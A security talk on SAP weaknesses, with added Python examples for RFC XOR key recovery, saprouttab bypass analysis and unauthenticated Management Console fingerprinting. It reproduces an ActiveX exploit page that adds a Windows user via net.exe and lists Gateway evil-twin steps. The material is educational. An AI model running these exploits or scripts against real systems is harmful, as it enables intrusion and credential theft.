Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 2 SAP (in)security – FH St.Pölten
world$whoami
Chris John Riley
English (that was obvious really)
Network and Web-App Penetration Tester
Working for Raiffeisen Informatik Security Competence Center in Zwettl
13+ years working in IT (unlucky 13?)
A bit of everything really... "Jack of all trades"
Still learning something new every day
As we all should!
Blogger (http://blog.c22.cc)
Twitterer (@ChrisJohnRiley) (is that even a word?)
Podcaster (Eurotrash Security Podcast - NSFW)
"The wisest man is he who knows that he knows nothing"
What we’ll cover today
SAP Basics
SAP Architecture
SAP Components
SAP Threats / Attacks
SAP Conclusions
1. SAP Basics
What is SAP?
"...the world's leading provider of business software, SAP (which stands for "Systems, Applications, and Products in Data Processing") delivers products and services that help accelerate business innovation for our customers."
source: sap.com
What is SAP?
SAP Offerings
ERP (Enterprise Resource Planning)
CRM (Customer Relationship Management)
SCM (Supply Chain Management)
PLM (Product Life-cycle Management)
SRM (Supplier Relationship Management)
GRC (Governance, Risk and Compliance)
What is SAP?
Customers in 120 countries
More than 100,000 clients worldwide
More than 40,000 employees
More than 140,000 SAP implementations
Covering every possible industry, from Automotive to Wholesale Distribution
What is SAP?
Growing target, despite its complexity
Holds the keys to the kingdom
Financial data
Personal data
Client data
Business workflows
…
Surely such an important system must be secured!
RIGHT?
2010 Patches
2010: SAP releases more than 900 fixes
Large complex systems will always have configuration issues
Vulnerabilities per line of code?
*Industry Average: "~15 - 50 errors per 1000 lines of delivered code"
Code Execution
Buffer Overflows
Cross-Site Scripting
....
*source: "Code Complete" by Steve McConnell
2. SAP Architecture
SAP Architecture
SAP R/3 (ABAP)
mySAP NetWeaver (Java/ABAP)
Three-tier client/server architecture:
Presentation Server
Application Server
Database Server
SAP Building Blocks
[Diagram: DEV, QAS and PRD systems; connection types RFC, DIAG and HTTP/HTTPS; mySAP, external customer and external server]
SAP Building Blocks
SAP DATABASE SERVER
Clients
Client | Name    | Default/CUST
000    | SAPR    | Default
001    | SAPR    | Default
066    | EARLY   | Default
500    | CLIENT1 | CUST
501    | CLIENT2 | CUST
502    | CLIENT3 | CUST
SAP Building Blocks
Connection protocols
DIAG: client connection (SAPGUI)
RFC: server-to-server connection
HTTP/HTTPS: WEBGUI, WebServices (Agate/Wgate/ITS)
Database: TNS Listener (Oracle), JDBC, ....
DIAG
Used for SAPGUI connections
Connections on port 32<instance> (e.g. 3200)
Proprietary protocol
Supports some RFC request types (sRFC)
Compressed, using a non-standard compression; decompression tools are available
Basically, clear-text!
RFC
Used for Server connections
Most used SAP protocol
Proprietary Protocol
Different Types of RFC communications
Synchronous (sRFC)
Asynchronous (aRFC)
Transactional (tRFC)
Queued (qRFC)
RFC
Helpful API released by SAP (rfcsdk)
Supports ext. clients / servers
Traffic is encrypted*
SAP offers SNC encryption at a cost!
* Traffic is XOR'd with a static key (that was a good idea):
Key = [0x96, 0xde, 0x51, 0x1e, 0x74, 0xe, 0x9, 0x9, 0x4, 0x1b, 0xd9,
0x46, 0x3c, 0x35, 0x4d, 0x8e, 0x55, 0xc5, 0xe5, 0xd4, 0xb, 0xa0, 0xdd,
0xd6, 0xf5, 0x21, 0x32, 0xf, 0xe2, 0xcd, 0x68, 0x4f, 0x1a, 0x50, 0x8f,
0x75, 0x54, 0x86, 0x3a, 0xbb]
Basically clear-text!
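The following is an added example, not code from the talk: it takes the 40 key bytes listed above and shows why XOR with a static key is equivalent to clear text (CWE-321). That the key is applied as a repeating byte stream from the start of the protected field is an assumption made for the illustration, not a statement about the RFC wire format, and the two logon records are constructed sample data.

```python
"""Added example: repeating-key XOR with the static key from the slide.
Assumption: the key is applied from offset 0 and repeats every 40 bytes."""

RFC_XOR_KEY = bytes([
    0x96, 0xde, 0x51, 0x1e, 0x74, 0x0e, 0x09, 0x09, 0x04, 0x1b, 0xd9,
    0x46, 0x3c, 0x35, 0x4d, 0x8e, 0x55, 0xc5, 0xe5, 0xd4, 0x0b, 0xa0, 0xdd,
    0xd6, 0xf5, 0x21, 0x32, 0x0f, 0xe2, 0xcd, 0x68, 0x4f, 0x1a, 0x50, 0x8f,
    0x75, 0x54, 0x86, 0x3a, 0xbb,
])


def xor_stream(data: bytes, key: bytes = RFC_XOR_KEY) -> bytes:
    """Repeating-key XOR. The same call 'encrypts' and 'decrypts': with a
    hard-coded key every installation, and every sniffer, shares the secret."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Even without the published key, any known plaintext (your own user name,
    a client number, a fixed header) yields the key bytes at those positions."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def key_from_own_session(own_plaintext: bytes, own_wire: bytes) -> bytes:
    """One captured session whose content you know (because it is yours) and
    that is at least one key period long gives back the whole key."""
    if len(own_plaintext) < len(RFC_XOR_KEY):
        raise ValueError("need at least one full key period of known plaintext")
    return recover_key(own_wire, own_plaintext)[: len(RFC_XOR_KEY)]


# Constructed sample records (not captured RFC traffic).
ATTACKER_LOGON = b"CLIENT=500 USER=ATTACKER PASSWD=Summer2011! LANG=EN"
VICTIM_LOGON = b"CLIENT=500 USER=ADMIN PASSWD=Passw0rd LANG=EN"


def demo() -> bytes:
    """Sniff my own logon, derive the key, then read everyone else's."""
    own_wire = xor_stream(ATTACKER_LOGON)             # what the wire shows for my session
    key = key_from_own_session(ATTACKER_LOGON, own_wire)
    victim_wire = xor_stream(VICTIM_LOGON)            # another user's session, same static key
    return xor_stream(victim_wire, key)               # recovers VICTIM_LOGON


if __name__ == "__main__":
    print(demo().decode())
```

The point of `key_from_own_session` is that the key never needs to leak from SAP at all: a single session with known content, plus the fact that the key does not change, is enough to read every other session on the same segment. Only SNC (or an IPsec/TLS tunnel around the connection) changes that.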
SNC
SAP's solution to the unencrypted communications of DIAG/RFC
Provides integrity and/or privacy
External product
Naturally... it's an add-on ($$$)
Not simple to implement (PKI?)
Afterthought?
SAP TechEd 2011
[slide image not captured in the text]
3. SAP Components
SAP Gateway
Handles ALL CPIC/RFC communications
Communications between SAP systems
Communications between SAP and external systems
Works in 2 modes
Started Mode
The gateway starts the external program on demand
Connection is closed after the operation completes
Registered Mode
External server registers itself at the gateway
Program ID (TPNAME) used to identify the connection
External server connection remains open
SAP Gateway
Round-robin / load-balancing support
Multiple servers can register with the same ID (TPNAME)
Service is locked while a request is being handled
Remote server can perform connect-backs to the client
While a client is connected, the remote server can instruct it to perform actions on other SAP servers
Default SAP configuration
No auth required
Anybody can register (registration is restricted only by the gateway's reginfo/secinfo ACL files; where none are configured, any host may register)
Not usually web accessible
At least, that's what I thought!
[Diagram: SAP server with SAP Gateway; registered programs SER1 and SER_EXT]
SAP Gateway (diagram, source: http://sap.com)
SAP Router
SAP's version of a reverse proxy
Designed to analyze / restrict SAP network traffic that is passed through the firewall
Sits on the perimeter (internet accessible!)
Listens on port 3299/tcp
Filters based on IP address / protocol
Logs activity
Enforces password security / SNC
Route string syntax: /H/host/S/service/W/password
Not all parameters are required (/S/ and /W/ are optional)
SAP Router: official SAP Router diagram (source: http://help.sap.com)
SAP Router
Why would you want to do that!
Connections from external partners
Remote Administration
Internal staff
Required for SAP AG (mandatory)
Monitoring
Troubleshooting
…
SAP Router - saprouttab
Example:
D  192.168.0.1  192.168.0.200  servicex
P  192.168.1.1  192.168.0.200  3300  passwd
S  192.168.2.2  192.168.0.200  *     sappwd
KP *            192.168.0.200  4444
....
First match wins; deny on no match
D  - Deny
P  - Permit
S  - Permit SAP protocol only
Kx - Force SNC (e.g. KP, KS)
SAP Router
Example (realistic):
saprouttab
----------------------------------------------------------------------------------
P * * *
----------------------------------------------------------------------------------
Permit any/any
Well, it works!
SAP Router (New)
Permit any/any still works (but not for everything)
* in the service field no longer means ANY
* excludes non-SAP services
This means no more firewall bypasses!
... or does it!
Commonly seen examples:
P 10.*.*.* * 3389 #Remote Desktop Protocol
P 10.1.*.* 10.2.*.* 5601 #PcAnywhere
P * * telnet
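As an added example (not from the talk), here is a small evaluator for the saprouttab semantics described on the last three slides (first match wins, no match means deny, D/P/S/K actions, per-octet wildcards, optional password) together with a parser for the /H/host/S/service/W/password route string. It goes a little beyond the slides in also modelling K (SNC required) rules and S rules hit by a non-SAP connection. The rule table is constructed for illustration, and the port ranges that a `*` service still matches under the new behaviour (32NN dispatcher, 33NN gateway, 3299 saprouter) are an assumption for the example, not SAP's full list.

```python
"""Added example: saprouttab rule evaluation and route-string parsing."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Rule:
    action: str          # D, P, S, or K-prefixed (KP, KS) meaning SNC required
    source: str          # client host/IP pattern, '*' allowed per octet
    target: str          # destination host/IP pattern
    service: str         # port number, service name or '*'
    password: str = ""   # optional; client must supply it via /W/ in the route


# Assumption for the example: what '*' still matches once it no longer means "any port".
SAP_PORT_RANGES = ((3200, 3299), (3300, 3399))
WELL_KNOWN_SERVICES = {"telnet": 23, "ssh": 22}   # small constructed lookup table


def parse_saprouttab(text: str) -> List[Rule]:
    """One rule per line: <action> <source> <target> <service> [<password>]; '#' starts a comment."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 4:
            raise ValueError(f"malformed saprouttab line: {raw!r}")
        rules.append(Rule(fields[0].upper(), fields[1], fields[2], fields[3],
                          fields[4] if len(fields) > 4 else ""))
    return rules


def _host_match(pattern: str, host: str) -> bool:
    if pattern == "*":
        return True
    p, h = pattern.split("."), host.split(".")
    return len(p) == len(h) and all(a == "*" or a == b for a, b in zip(p, h))


def _service_port(name: str) -> Optional[int]:
    """Numeric port, sapdpNN/sapgwNN, or a name from the small table above."""
    low = name.lower()
    if low.isdigit():
        return int(low)
    if low[:5] in ("sapdp", "sapgw") and low[5:].isdigit():
        return (3200 if low[:5] == "sapdp" else 3300) + int(low[5:])
    return WELL_KNOWN_SERVICES.get(low)


def _is_sap_port(port: int) -> bool:
    return port == 3299 or any(lo <= port <= hi for lo, hi in SAP_PORT_RANGES)


def evaluate(rules: List[Rule], source: str, target: str, port: int, password: str = "",
             sap_protocol: bool = True, snc: bool = False,
             strict_wildcard: bool = False) -> Tuple[str, Optional[Rule]]:
    """First matching rule decides; falling off the end is a deny.
    strict_wildcard=True models the new behaviour where '*' excludes non-SAP ports."""
    for r in rules:
        if not (_host_match(r.source, source) and _host_match(r.target, target)):
            continue
        if r.service == "*":
            if strict_wildcard and not _is_sap_port(port):
                continue
        elif _service_port(r.service) != port:
            continue
        # This rule matches; everything below is decided against it alone.
        if r.action == "D":
            return "deny", r
        if r.password and r.password != password:
            return "deny", r          # wrong /W/ password (assumption: no fall-through)
        if r.action.startswith("K") and not snc:
            return "deny", r          # K rules insist on SNC for this hop
        base = r.action.lstrip("K")
        if base == "S" and not sap_protocol:
            return "deny", r          # S permits the SAP protocol only
        if base in ("P", "S"):
            return "permit", r
        raise ValueError(f"unknown action {r.action}")
    return "deny", None


def parse_route(route: str) -> List[Dict[str, str]]:
    """'/H/host/S/service/W/password' repeated per hop; /S/ defaults to 3299, /W/ to empty."""
    tokens = route.strip("/").split("/")
    if len(tokens) % 2:
        raise ValueError("route string must consist of /key/value pairs")
    hops: List[Dict[str, str]] = []
    for key, value in zip(tokens[::2], tokens[1::2]):
        if key == "H":
            hops.append({"host": value, "service": "3299", "password": ""})
        elif key in ("S", "W") and hops:
            hops[-1]["service" if key == "S" else "password"] = value
        else:
            raise ValueError(f"unexpected route element /{key}/")
    return hops


# Constructed rule tables: the slide's table plus the "commonly seen" bypass rules.
EXAMPLE_TAB = """
D  192.168.0.1  192.168.0.200  *
P  192.168.1.1  192.168.0.200  3300  passwd
S  192.168.2.2  192.168.0.200  *     sappwd
KP *            192.168.0.200  4444
P  10.*.*.*     *              3389       # Remote Desktop Protocol
P  *            *              telnet
"""
ANY_ANY_TAB = "P * * *"
RULES = parse_saprouttab(EXAMPLE_TAB)
ANY_ANY = parse_saprouttab(ANY_ANY_TAB)

if __name__ == "__main__":
    print(evaluate(RULES, "10.1.2.3", "172.16.0.5", 3389))              # RDP through the router
    print(evaluate(ANY_ANY, "1.2.3.4", "10.0.0.1", 1521, strict_wildcard=True))
    print(parse_route("/H/saprouter.example.com/S/3299/W/secret/H/10.0.0.5/S/3200"))
```

Run against the "realistic" any/any table, the evaluator permits a connection to TCP 1521 under the old wildcard semantics and denies it under the new one, which is exactly the slide's point: the wildcard change closes `P * * *`, but an explicit `P 10.*.*.* * 3389` or `P * * telnet` still routes non-SAP traffic straight through the perimeter.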
SAP Web Dispatcher
Acts as a reverse proxy / load balancer for HTTP(S) requests
Load balancing, selecting the appropriate application server
Sits on the perimeter
Hides internal infrastructure
Filters URLs
Implements SSL in 2 modes
End-to-end: connections forwarded without decryption
SSL terminator: connections decrypted at the dispatcher
SAP ITS / ICM
ITS (Internet Transaction Server)
Enables web access to SAP applications
Translates dialog screens into HTML
SAPGUI for the Internet!
ICM (Internet Communication Manager)
Direct access to the SAP application server through HTTP(S) / SMTP
Unlike ITS, users don't need to interact with middleware
Requests handled directly by the Web Application Server
SAP in the Internet age!
Now even China can see your customer list!
SAP WebServices
SAP Management Console's communication channel (the sapstartsrv web service)
Communicates over port 5<instance>13/14 (e.g. 50013)
Can use SSL for transport encryption (port 5<instance>14, e.g. 50014)
Uses BASIC auth for some functions
Windows: MMC plug-in, uses SOAP requests in the background
*nix: Java applet, uses SOAP requests in the background
The B!G picture
How often are these ports open to the world?
AKA: scanning a small country
Ports 3299, 3300, 50013, 50014
SYN scan only; we don't want to connect to them after all!
[Bar chart "SAP Ports Austria": hosts with open SAP Router (3299), SAP Gateway (3300), SAP MC (50013) and SAP MC SSL (50014) ports; y-axis from 2570 to 2660]
4. SAP Threats / Attacks
Drinking from the firehose of information technology
What we've already seen
CWE-319*: Cleartext Transmission of Sensitive Information
RFC - XOR (CWE-321*: Use of Hard-coded Cryptographic Key)
DIAG - encoded/compressed
SOAP over HTTP
ICM/ITS over HTTP
Usage of SSL / SNC optional (costs)
* (http://cwe.mitre.org)
[Diagram: DEV, QAS and PRD systems; connection types RFC, DIAG and HTTP/HTTPS; mySAP, external customer and external server]
What we’ve already seen (SAPGUI)
Attacks
• Man in the Middle
• Replay Attacks
• Sniffing (usernames, passwords)
What we've already seen (SAP Database)
No separation of client data
All client data is stored in the same database
One hack to rule them all!
Developers can run direct SQL queries
Attackers can gain access through one client and access ALL data
No valid separation of permissions on the DB
(Client table as on the SAP Building Blocks slide: 000/001 SAPR default, 066 EARLY default, 500-502 CLIENT1-3 customer)
Attacks
• Exposure of client data
• Command injection through DB
What we've already seen (ORACLE)
Oracle Database
Have you heard of OSAUTHENT?
Remote OS authentication (sounds harmless)
Trusts the remote system to perform authentication! (OPS$ users)
Connection example:
1. User logged into remote system as sapadm
2. Connects to Oracle TNS Listener (port 1521)
3. User says "I'm authenticated on my system as sapadm"
4. Oracle server replies "Yes sir! Welcome sapadm"
5. Profit!
What we've already seen (ORACLE)
Oracle Database
It's OK though, you can turn that feature off (the parameter is deprecated as of Oracle 11g, but still honoured where set):
remote_os_authent = false
As long as you set the username / password to a static value
SAPR3:PASS
Attacks
• Complete SAP DB access
• NO PASSWORD REQUIRED!
What we've already seen (SAP Gateway)
SAP Gateway registration
Remote systems register themselves with the SAP server
What would happen if an attacker registers?
No authentication by default
Anybody can be a server!
[Diagram: SAP server with SAP Gateway; registered programs SER1 and ATTACKER1]
SAP Gateway - Exploitation
Attacks
• Evil twin / Man in the Middle
• Denial of Service
[Diagram: SAP server with SAP Gateway; the legitimate SER1 is blocked (in use) while the attacker registers as SER1]
1. Attacker connects to the existing registered server (ID=SER1)
2. By maintaining this connection the registered server is blocked
3. Attacker registers themselves on the gateway as ID=SER1 also
4. Wait for connections from clients/servers
5. Profit!
What we’ve already seen (RFC)
Many other issues with RFC
Insecure functions
RFC_DOCU
RFC_PING
RFC_SYSTEM_INFO
RFCEXEC
Buffer Overflows
….
Attacks
• Lack of authentication on RFC functions
• Exposure of information
• Command injection
What we've already seen (SAP Router)
SAP Router
Designed to route traffic
Why not take advantage of those ANY:ANY rules to bypass the firewall
Connect through the SAProuter port using tsocks
Attack the weak underbelly of the server!
Attacks
• Firewall bypass
[Diagram: attacker's TCP 1521 connection is routed through the SAP Router to the Oracle DB behind the SAP server; RFC is routed the same way]
What we've already seen (Client-Side)
Patching client-side applications is still a problem
Often no central management
Why patch it if it works!
Client-side ActiveX
SAPGUI
Lots of client-side exploits public
Some very simple to exploit
Attacks
• Client-side code execution
• Web-based exploitation (ActiveX)
Client-Side ActiveX – Exploit Example
<html>
<title>*DSecRG* Add user *DSecRG*</title>
<object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344" id='DH'></object>
<script language='Javascript'>
function init()
{
  DH.Execute("net.exe", "user don_huan p4ssW0rd /add", "d:\\windows\\", 1, "", 1);
}
init();
</script>
</html>
Current Research
WebServices (Management Console)
SOAP requests, many unauthenticated
Enabled by default on ALL SAP systems
Lots of interesting pieces of information for an attacker
Data extraction: surely there's nothing useful here!
Current Research
WebServices (Management Console)
Unauthenticated access to :
SAP Version information (down to patch level)
SAP Startup profile
SAP Instance properties
System environment variables
List SAP logfiles
Download / View complete logfiles
Including username information
Current Research
WebServices (Management Console)
Automate the extraction of data with Metasploit*
source: http://blog.c22.cc
Attacks
• Information Disclosure
• Extraction of Usernames
• SAP Instance information
• Extract Version information
• OSexecute
WebService - Version Information
…
[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
[+] [SAP] SID: NSP
WebService – Start Profile
[+] SAPSYSTEMNAME – NSP
[+] SAPGLOBALHOST – WINXPSAP-TST
[+] SAPSYTEM – 00
[+] INSTANCE_NAME – DVEBMGS00
…
WebService – Instance / Environment
[+] SAP SYSTEM NUMBER: 00
[+] SAP SYSTEM NAME: NSP
[+] ICM URL: HTTP://WINXPSAP-TST/ICM
[+] DATABASE: Database-SAPDB
…
[+] COMPUTERNAME=WINXPSAPTST
[+] PATH: …
[+] PROCESSOR ARCHITECTURE =x86
…
WebService – Log Files
Information Disclosure
• SAP Status
• Startup Times
• PID
• Errors
• Debug data
• …
WebService – Log Files (extract users)
Information Disclosure
• Usernames
• Lockout information
• …
SAP Management Console
Goldmine of information
As we‘ve seen
The present that keeps on giving!
But there‘s more…
Ability to brute-force passwords
Output a FULL configuration!
Execute commands on the remote server
Gain shell access
…
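The extraction the Management Console slides describe, as an added example that is not part of the talk and not the Metasploit modules it cites. It builds the SOAP requests that sapstartsrv answers on port 5<NN>13 for two of the public SAPControl methods (GetVersionInfo and GetStartProfile) and parses the replies offline. The two responses embedded below are constructed to match the output shown on the slides, not captured traffic; `call()` is the only function that touches the network and is not exercised by the offline demo.

```python
"""Added example: unauthenticated SAP Management Console (sapstartsrv) fingerprinting."""
import urllib.request
import xml.etree.ElementTree as ET
from typing import Dict, List

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
SAPCONTROL_NS = "urn:SAPControl"


def mgmt_console_url(host: str, instance: str, ssl: bool = False) -> str:
    """5<instance>13 for HTTP, 5<instance>14 for HTTPS (50013 / 50014 for instance 00)."""
    port = 50000 + int(instance) * 100 + (14 if ssl else 13)
    return f"{'https' if ssl else 'http'}://{host}:{port}/"


def soap_request(method: str) -> bytes:
    """SOAP 1.1 envelope for a parameterless SAPControl method; no credentials are sent."""
    return (
        f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_ENV}"><SOAP-ENV:Body>'
        f'<ns1:{method} xmlns:ns1="{SAPCONTROL_NS}"/>'
        '</SOAP-ENV:Body></SOAP-ENV:Envelope>'
    ).encode()


def call(url: str, method: str, timeout: float = 10) -> bytes:
    """Send one request to a live instance (network access; not used by the demo)."""
    req = urllib.request.Request(
        url, data=soap_request(method), method="POST",
        headers={"Content-Type": "text/xml; charset=utf-8", "SOAPAction": ""})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


def _local(tag: str) -> str:
    """Strip the namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def parse_version_info(xml_bytes: bytes) -> List[Dict[str, str]]:
    """GetVersionInfo: one <item> (Filename / VersionInfo / Time) per kernel executable."""
    root = ET.fromstring(xml_bytes)
    return [{_local(f.tag): (f.text or "").strip() for f in item}
            for item in root.iter() if _local(item.tag) == "item" and len(item) > 1]


def parse_start_profile(xml_bytes: bytes) -> Dict[str, str]:
    """GetStartProfile: profile lines come back as <item>KEY = VALUE</item>."""
    root = ET.fromstring(xml_bytes)
    profile: Dict[str, str] = {}
    for item in root.iter():
        text = (item.text or "").strip()
        if _local(item.tag) == "item" and "=" in text and not text.startswith("#"):
            key, value = text.split("=", 1)
            profile[key.strip()] = value.strip()
    return profile


def fingerprint(version_xml: bytes, profile_xml: bytes) -> Dict[str, str]:
    """The facts an attacker collects first: SID, instance, host and exact kernel patch level."""
    versions = parse_version_info(version_xml)
    profile = parse_start_profile(profile_xml)
    return {
        "sid": profile.get("SAPSYSTEMNAME", ""),
        "instance": profile.get("INSTANCE_NAME", ""),
        "host": profile.get("SAPGLOBALHOST", ""),
        "kernel": versions[0]["VersionInfo"] if versions else "",
    }


# Constructed sample responses (values taken from the slides, not captured traffic).
SAMPLE_VERSION_RESPONSE = b"""<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SAP="urn:SAPControl">
<SOAP-ENV:Body><SAP:GetVersionInfoResponse><version>
<item><Filename>D:\\usr\\sap\\NSP\\DVEBMGS00\\exe\\disp+work.EXE</Filename>
<VersionInfo>720, patch 70, changelist 1203517, optU, NTintel</VersionInfo>
<Time>2011 10 17 12:00:00</Time></item>
</version></SAP:GetVersionInfoResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""

SAMPLE_PROFILE_RESPONSE = b"""<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SAP="urn:SAPControl">
<SOAP-ENV:Body><SAP:GetStartProfileResponse><name>START_DVEBMGS00_WINXPSAP-TST</name><lines>
<item>#.*****************************************</item>
<item>SAPSYSTEMNAME = NSP</item>
<item>SAPGLOBALHOST = WINXPSAP-TST</item>
<item>SAPSYSTEM = 00</item>
<item>INSTANCE_NAME = DVEBMGS00</item>
</lines></SAP:GetStartProfileResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""

if __name__ == "__main__":
    print(mgmt_console_url("WINXPSAP-TST", "00"))
    print(fingerprint(SAMPLE_VERSION_RESPONSE, SAMPLE_PROFILE_RESPONSE))
```

Against a real instance the same two calls are `call(mgmt_console_url(host, "00"), "GetVersionInfo")` and `... "GetStartProfile"`, and the result is the kernel patch level and instance layout with no password asked. The check a practitioner wants afterwards is the instance profile parameter `service/protectedwebmethods`: with the value SDEFAULT (or an explicit method list) the sensitive methods, OSExecute and the log readers among them, require authentication; sapstartsrv has to be restarted for the change to take effect.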
5. SAP Conclusions
Conclusions
Historical SAP Security
Separation of privileges
Developer access checks
Debug permissions
Password policies
ABAP code security
Conclusions
The new school
Infrastructure attacks
Database vulnerabilities
Buffer overflows (saplpd, ...)
Web application vulnerabilities
XSS
CSRF
Attacks against the clients
SAPGUI
ActiveX components
Conclusions
SAP - the new hotness
Blackhat DC / Las Vegas
DefCon
Troopers
DeepSEC
Blackhat EU
BSides
....
SAP presentations are the new black!
Patching SAP
Patches are released monthly
To coincide with MS patch Tuesday
Very limited information sharing outside of acknowledgments
Note
• Imagine running that process for 500 patches!
• Don’t forget to patch the OS, DB, clients
• Not a simple prospect!
Patching SAP (server)
Applying patches
Download each patch from SAP (registration required)
Apply to DEV/QA systems using SPAM (SAP Patch Manager)
Perform required testing
Schedule downtime
All users must be logged off during update process
Apply to PROD using SPAM
Perform required testing
Patching SAP (custom code)
Patching troubles
Often patches break existing functionality/code
3rd Party patching solutions available
Panaya - SAP Upgrade Automation
Analyses custom code
Tells you what could break!
Patching SAP (client)
Regular patches to correct client-side security flaws
Supported in PSI/CSI*
Simple central rollout
Often forgotten!
* Limited information on secunia website
Hardening?
Searching for "hardening" on the SAP site returns documents dating from ~2006
Other results include people requesting hardening guidance
SAP hardening guides
SAP hardening and patch management guide for Windows server http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/library/uuid/31d3e9ef-0c01-0010-01b8-8fbf154c0aca
Last updated 08 August 2008
help.sap.com: range of (mostly business) best practice guides
Best practice / secure programming references
Some limited security documentation
Conclusions
This presentation only scratches the surface
SAP released more than 900 fixes in 2010
Large complex system
Many bugs yet to be discovered!
SAP has become, and will remain, a prime target for attackers
All the good stuff in one place
Keys to the kingdom
Bad patching practices
If it's not broken don't fix it
Never touch a running system
Lack of information from SAP
Questions?
Comments?
Abuse!
Thank you for your attention!
Raiffeisen Informatik GmbH
Lilienbrunngasse 7-9
A-1020 Wien
T +43 1/99 3 99 - 0
F +43 1/99 3 99 - 1100
www.raiffeiseninformatik.at